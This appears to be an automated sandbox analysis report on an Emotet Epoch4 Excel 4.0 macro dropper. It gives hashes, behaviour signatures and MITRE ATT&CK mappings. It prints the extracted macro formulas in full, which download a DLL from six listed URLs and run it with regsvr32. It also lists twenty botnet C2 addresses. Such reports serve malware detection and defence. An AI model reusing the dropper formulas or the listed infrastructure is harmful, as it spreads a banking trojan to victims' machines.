emotet

General

Target

gwrqaqva
Size

50KB
Sample

220503-n2d97sdeb2
MD5

793c5a832ea9b3c4a225bc96b4449bc2
SHA1

168afc78144b659b18b606a26c3e9a6343dd104a
SHA256

894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7
SHA512

df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Score

10^/10

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

http://hoatuoiso1.com/replace/fVea/

https://rumkeke.com/wp-admin/A8/

https://www.restaurantgaig.com/wp-includes/HLDoANj/

http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/

http://www.hiway91.com/wp-content/Y/

Attributes

formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/","..\rulm.dll",0,0) =IF('EGSBBB'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hoatuoiso1.com/replace/fVea/","..\rulm.dll",0,0)) =IF('EGSBBB'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rumkeke.com/wp-admin/A8/","..\rulm.dll",0,0)) =IF('EGSBBB'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.restaurantgaig.com/wp-includes/HLDoANj/","..\rulm.dll",0,0)) =IF('EGSBBB'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/","..\rulm.dll",0,0)) =IF('EGSBBB'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.hiway91.com/wp-content/Y/","..\rulm.dll",0,0)) =IF('EGSBBB'!D22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll") =RETURN()

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

Extracted

Family

emotet

Botnet

Epoch4

C2

68.183.94.239:80

104.131.11.205:443

138.197.109.175:8080

187.84.80.182:443

79.143.187.147:443

216.158.226.206:443

167.99.115.35:8080

212.24.98.99:8080

1.234.21.73:7080

206.189.28.199:8080

158.69.222.101:443

164.68.99.3:8080

188.44.20.25:443

185.157.82.211:8080

134.122.66.193:8080

196.218.30.83:443

72.15.201.15:8080

5.9.116.246:8080

176.104.106.96:8080

153.126.146.25:7080

eck1.plain

ecs1.plain

Targets

- Target
  
  gwrqaqva
- Size
  
  50KB
- MD5
  
  793c5a832ea9b3c4a225bc96b4449bc2
- SHA1
  
  168afc78144b659b18b606a26c3e9a6343dd104a
- SHA256
  
  894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7
- SHA512
  
  df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607
Score

10^/10

emotet epoch4 banker trojan
- Emotet
  Emotet is a trojan that is primarily spread through spam emails.
  trojan banker emotet
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Downloads MZ/PE file
- Loads dropped DLL
- Drops file in System32 directory
behavioral1 behavioral2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Tasks

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Targets

Process spawned unexpected child process

Downloads MZ/PE file

Loads dropped DLL

Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks

static1

behavioral1

behavioral2